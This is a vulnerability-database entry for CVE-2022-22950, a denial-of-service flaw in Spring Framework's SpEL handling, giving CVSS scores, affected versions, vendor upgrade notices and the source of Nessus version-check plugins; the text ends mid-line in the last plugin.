CVE-2022-22950

2022-04-01T23:15:00

Description

n Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.

Affected Software

CPE Name	Name	Version
vmware:spring_framework	vmware spring framework	5.2.20
vmware:spring_framework	vmware spring framework	5.3.17

{"id": "CVE-2022-22950", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2022-22950", "description": "n Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.", "published": "2022-04-01T23:15:00", "modified": "2022-06-22T13:53:00", "epss": [{"cve": "CVE-2022-22950", "epss": 0.00072, "percentile": 0.29468, "modified": "2023-06-09"}], "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.0}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22950", "reporter": "security@vmware.com", "references": ["https://tanzu.vmware.com/security/cve-2022-22950"], "cvelist": ["CVE-2022-22950"], "immutableFields": [], "lastseen": "2023-06-09T14:37:32", "viewCount": 375, "enchantments": {"twitter": {"counter": 3, "tweets": [{"link": "https://twitter.com/micsieg/status/1524903518297116674", "text": "Security Bulletin: A vulnerability in Spring Framework affects IBM Tivoli Application Dependency Discovery Manager (CVE-2022-22950, CVE-2021-22096, CVE-2022-22968, CVE-2021-22060).", "author": "micsieg", "author_photo": "https://pbs.twimg.com/profile_images/941241322064830465/bbH-XJ4h_400x400.jpg"}, {"link": "https://twitter.com/joshiarunkumar1/status/1561260720238383105", "text": "/sghill Is jenkins affected by Spring - CVE-2022-22950:", "author": "sghill Is jenkins affected by Spring - CVE-2022-22950:\" / Twitter", "author_photo": null}]}, "score": {"value": 3.9, "vector": "NONE"}, "dependencies": {"references": [{"type": "cert", "idList": ["VU:970766"]}, {"type": "checkpoint_security", "idList": ["CPS:SK178605"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2022-22950"]}, {"type": "f5", "idList": ["F5:K11510688"]}, {"type": "github", "idList": ["GHSA-558X-2XJG-6232"]}, {"type": "ibm", "idList": ["14108283F9157C4F2A38313CFBD3F47CFDC207CBE84809E04B7E197DA546B8D3", "1EA754AFF092ED1712E3DBFA763C4962C7EF40031818AB374A5E52A9E9586AAD", "2BE1B762E9F077419A696E0C1B88E2D3F236BE3549BFC2182468480E071BF032", "2FB703AAD3FC5C2BE7EED7EC7E69FEBE209E6C70177FEA76C552605DF83D85ED", "370CF55655D0DCE5B827E549AA74D877B1D4BA2D531AAEFFDF0A6CA27218326F", "471BEEF44DE6C27461378C7D110744F38E295FB10C4A50D100750E5E0D7941A0", "537163AF6A43E9635AC6244334A6987334AAAED355BDEC033C662E7748C0C124", "67BA75B2F60B75FF432F4A7CBDBC2D43DE52B633C04D3C54ADA035D39D2605F7", "6C544B97B62B9464D51C78F9B268DAFEF4ADE09A38B1D9BEF0D8564D5CC42D88", "8D1FFB0AFC90D6F732CB992E0BDEB82F435593D96A68A03F6DD265E83892C473", "933F16C198EDF616BD60B2C55B4AE9B642F3BD83CA146DEBB0E52EC9050248AF", "A97F6751F71164D0A07AD868814BD46D147EF591C7234360EA8F62B2317AA675", "B2EA2FBA4D280351FEA7F9EC1921C448D44F4D9EC613590A87A15467F7D34153", "B65E10799869808B38D96576AA4BC705E6DCC5744AAC77554C2319CB82A9DE27", "C0904FD149C70D8A2835DB923B2BF04803388EF83CB969D07F28836C567C672B", "C602AE40F6974D4EE4D596F81D007D4F74282F20DC8B4859AE08925E2CE79326", "CE1EA8BD930C36AD90F7CB9A4D45A1E00F086D40B88449DF5CAD4F426F6C3DF7", "EBCC12197854D7C444B518B80A223576FCB219A088A0CC929C19FF2993DC431A", "F426BDEEA0109CBE44C73C53461CE7144BDD04ADCF7EC044CE76723EAE672095"]}, {"type": "ics", "idList": ["ICSA-22-286-05"]}, {"type": "nessus", "idList": ["EMC_NETWORKER_DSA-2022-350.NASL", "REDHAT-RHSA-2022-5555.NASL", "SPRING_CVE-2022-22950.NASL"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2023", "ORACLE:CPUJAN2023"]}, {"type": "osv", "idList": ["OSV:GHSA-558X-2XJG-6232"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49"]}, {"type": "redhat", "idList": ["RHSA-2022:5532", "RHSA-2022:5555", "RHSA-2022:5903", "RHSA-2022:8761"]}, {"type": "redhatcve", "idList": ["RH:CVE-2022-22950"]}, {"type": "spring", "idList": ["SPRING:DE384E814B204ABC68C9A98C00ACA572"]}, {"type": "thn", "idList": ["THN:51196AEF32803B9BBB839D4CADBF5B38"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2022-22950"]}, {"type": "veracode", "idList": ["VERACODE:35014"]}]}, "affected_software": {"major_version": [{"name": "vmware spring framework", "version": 5}, {"name": "vmware spring framework", "version": 5}]}, "epss": [{"cve": "CVE-2022-22950", "epss": 0.00072, "percentile": 0.29287, "modified": "2023-05-02"}], "vulnersScore": 3.9}, "_state": {"twitter": 0, "score": 1686321720, "dependencies": 1686329536, "affected_software_major_version": 0, "epss": 0}, "_internal": {"score_hash": "5afe63ddb08d8313e20a6661f980cf3d"}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-770"], "affectedSoftware": [{"cpeName": "vmware:spring_framework", "version": "5.2.20", "operator": "lt", "name": "vmware spring framework"}, {"cpeName": "vmware:spring_framework", "version": "5.3.17", "operator": "lt", "name": "vmware spring framework"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:vmware:spring_framework:5.2.20:*:*:*:*:*:*:*", "versionEndExcluding": "5.2.20", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:vmware:spring_framework:5.3.17:*:*:*:*:*:*:*", "versionStartIncluding": "5.3.0", "versionEndExcluding": "5.3.17", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://tanzu.vmware.com/security/cve-2022-22950", "name": "https://tanzu.vmware.com/security/cve-2022-22950", "refsource": "MISC", "tags": ["Mitigation", "Vendor Advisory"]}], "product_info": [{"vendor": "Vmware", "product": "Spring_framework"}], "solutions": [], "workarounds": [], "impacts": [], "problemTypes": [{"descriptions": [{"cweId": "CWE-770", "description": "CWE-770: Allocation of Resources Without Limits or Throttling", "lang": "en", "type": "CWE"}]}], "exploits": []}

{"veracode": [{"lastseen": "2023-04-18T06:29:36", "description": "Spring Expression is vulnerable to denial of service. The vulnerability exists due to the creation of large array in a SpEL and sending meaningless error messages to the user which allows an attacker to send crafted SpEL expressions that leads to an out ouf bound error causing an application crash. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-07T12:06:55", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2022-06-22T15:16:24", "id": "VERACODE:35014", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-35014/summary", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}], "spring": [{"lastseen": "2022-04-27T14:58:04", "description": "We have released [Spring Framework 5.3.17](<https://spring.io/blog/2022/03/17/spring-framework-6-0-0-m3-and-5-3-17-available-now>) and [Spring Framework 5.2.20](<https://github.com/spring-projects/spring-framework/releases/tag/v5.2.20.RELEASE>) to address the following CVE report.\n\n * [CVE-2022-22950: Spring Expression DoS Vulnerability](<https://tanzu.vmware.com/security/cve-2022-22950>)\n\nPlease review the information in the CVE report and upgrade immediately.\n\nSpring Boot users should upgrade to [2.5.11](<https://spring.io/blog/2022/03/24/spring-boot-2-5-11-available-now>) or [2.6.5](<https://spring.io/blog/2022/03/24/spring-boot-2-6-5-available-now>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-28T08:00:00", "type": "spring", "title": "CVE report published for Spring Framework", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2022-03-28T08:00:00", "id": "SPRING:DE384E814B204ABC68C9A98C00ACA572", "href": "https://spring.io/blog/2022/03/28/cve-report-published-for-spring-framework", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2023-05-17T16:37:53", "description": "The version of Dell EMC NetWorker installed on the remote Windows host is prior to 19.8. It, therefore, contains a version of Spring Framework that is affected by a denial of service (DoS) vulnerability.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-12-13T00:00:00", "type": "nessus", "title": "Dell EMC NetWorker < 19.8 DoS (DSA-2022-350)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22950"], "modified": "2022-12-14T00:00:00", "cpe": ["cpe:/a:dell:emc_networker"], "id": "EMC_NETWORKER_DSA-2022-350.NASL", "href": "https://www.tenable.com/plugins/nessus/168650", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(168650);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/14\");\n\n script_cve_id(\"CVE-2022-22950\");\n\n script_name(english:\"Dell EMC NetWorker < 19.8 DoS (DSA-2022-350)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application installed that is affected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Dell EMC NetWorker installed on the remote Windows host is prior to 19.8. It, therefore, contains a\nversion of Spring Framework that is affected by a denial of service (DoS) vulnerability.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.dell.com/support/kbdoc/en-ie/000206132/dsa-2022-350-dell-networker-security-update-for-spring-framework-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2f8a39c1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade Dell EMC Networker to 19.8 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22950\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/12/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:dell:emc_networker\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"emc_networker_installed.nasl\");\n script_require_keys(\"installed_sw/EMC NetWorker\", \"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\n\nvar app_info = vcf::get_app_info(app:'EMC NetWorker', win_local:TRUE);\n\nvar constraints = [\n { 'fixed_version' : '19.7', 'fixed_display': '19.8' }\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_WARNING\n);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T18:30:35", "description": "The remote host contains a Spring Framework version that is prior to 5.2.20 or 5.3.x prior to 5.3.17. It is, therefore, affected by denial of service vulnerability. A remote, authenticated attacker could provide a specially crafted SpEL as a routing expression that may result in denial of service condition.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-06-08T00:00:00", "type": "nessus", "title": "Spring Framework < 5.2.20 / 5.3.x < 5.3.17 DoS (CVE-2022-22950)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22950"], "modified": "2022-10-04T00:00:00", "cpe": ["cpe:/a:pivotal_software:spring_framework"], "id": "SPRING_CVE-2022-22950.NASL", "href": "https://www.tenable.com/plugins/nessus/161949", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161949);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/10/04\");\n\n script_cve_id(\"CVE-2022-22950\");\n\n script_name(english:\"Spring Framework < 5.2.20 / 5.3.x < 5.3.17 DoS (CVE-2022-22950)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web application framework that is affected by denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a Spring Framework version that is prior to 5.2.20 or 5.3.x prior to 5.3.17. It is, therefore, \naffected by denial of service vulnerability. A remote, authenticated attacker could provide a specially crafted SpEL as a\nrouting expression that may result in denial of service condition.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tanzu.vmware.com/security/CVE-2022-22950\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Spring Framework version 5.2.20 or 5.3.17 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22950\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pivotal_software:spring_framework\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"spring_jar_detection.nbin\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'Spring Framework');\n\nvar constraints = [\n { 'min_version':'5.2', 'fixed_version':'5.2.20' },\n { 'min_version':'5.3', 'fixed_version':'5.3.17' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:32:47", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2022:5555 advisory.\n\n - springframework: malicious input leads to insertion of additional log entries (CVE-2021-22096)\n\n - nodejs-trim-newlines: ReDoS in .end() method (CVE-2021-33623)\n\n - apache-commons-compress: infinite loop when reading a specially crafted 7Z archive (CVE-2021-35515)\n\n - apache-commons-compress: excessive memory allocation when reading a specially crafted 7Z archive (CVE-2021-35516)\n\n - apache-commons-compress: excessive memory allocation when reading a specially crafted TAR archive (CVE-2021-35517)\n\n - apache-commons-compress: excessive memory allocation when reading a specially crafted ZIP archive (CVE-2021-36090)\n\n - nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes (CVE-2021-3807)\n\n - spring-expression: Denial of service via specially crafted SpEL expression (CVE-2022-22950)\n\n - semantic-release: Masked secrets can be disclosed if they contain characters that are excluded from uri encoding (CVE-2022-31051)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-15T00:00:00", "type": "nessus", "title": "RHEL 8 : RHV Manager (ovirt-engine) [ovirt-4.5.1] (RHSA-2022:5555)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22096", "CVE-2021-33623", "CVE-2021-35515", "CVE-2021-35516", "CVE-2021-35517", "CVE-2021-36090", "CVE-2021-3807", "CVE-2022-22950", "CVE-2022-31051"], "modified": "2023-02-02T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:8", "p-cpe:/a:redhat:enterprise_linux:apache-commons-compress", "p-cpe:/a:redhat:enterprise_linux:apache-commons-compress-javadoc", "p-cpe:/a:redhat:enterprise_linux:ovirt-dependencies", "p-cpe:/a:redhat:enterprise_linux:ovirt-web-ui"], "id": "REDHAT-RHSA-2022-5555.NASL", "href": "https://www.tenable.com/plugins/nessus/163260", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2022:5555. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163260);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/02\");\n\n script_cve_id(\n \"CVE-2021-3807\",\n \"CVE-2021-33623\",\n \"CVE-2021-35515\",\n \"CVE-2021-35516\",\n \"CVE-2021-35517\",\n \"CVE-2021-36090\",\n \"CVE-2022-22950\",\n \"CVE-2022-31051\"\n );\n script_xref(name:\"RHSA\", value:\"2022:5555\");\n\n script_name(english:\"RHEL 8 : RHV Manager (ovirt-engine) [ovirt-4.5.1] (RHSA-2022:5555)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2022:5555 advisory.\n\n - springframework: malicious input leads to insertion of additional log entries (CVE-2021-22096)\n\n - nodejs-trim-newlines: ReDoS in .end() method (CVE-2021-33623)\n\n - apache-commons-compress: infinite loop when reading a specially crafted 7Z archive (CVE-2021-35515)\n\n - apache-commons-compress: excessive memory allocation when reading a specially crafted 7Z archive\n (CVE-2021-35516)\n\n - apache-commons-compress: excessive memory allocation when reading a specially crafted TAR archive\n (CVE-2021-35517)\n\n - apache-commons-compress: excessive memory allocation when reading a specially crafted ZIP archive\n (CVE-2021-36090)\n\n - nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes (CVE-2021-3807)\n\n - spring-expression: Denial of service via specially crafted SpEL expression (CVE-2022-22950)\n\n - semantic-release: Masked secrets can be disclosed if they contain characters that are excluded from uri\n encoding (CVE-2022-31051)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-3807\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-22096\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-33623\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-35515\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-35516\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-35517\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-36090\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-22950\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-31051\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2022:5555\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1966615\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1981895\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1981900\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1981903\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1981909\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2007557\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2034584\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2069414\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2097414\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-31051\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 200, 212, 400, 770, 835);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-compress\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-compress-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-dependencies\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-web-ui\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'Red Hat 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/layered/rhel8/x86_64/rhv-manager/4.4/debug',\n 'content/dist/layered/rhel8/x86_64/rhv-manager/4.4/os',\n 'content/dist/layered/rhel8/x86_64/rhv-manager/4.4/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'apache-commons-compress-1.21-1.2.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'apache-commons-compress-javadoc-1.21-1.2.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-dependencies-4.5.2-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-web-ui-1.9.0-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = 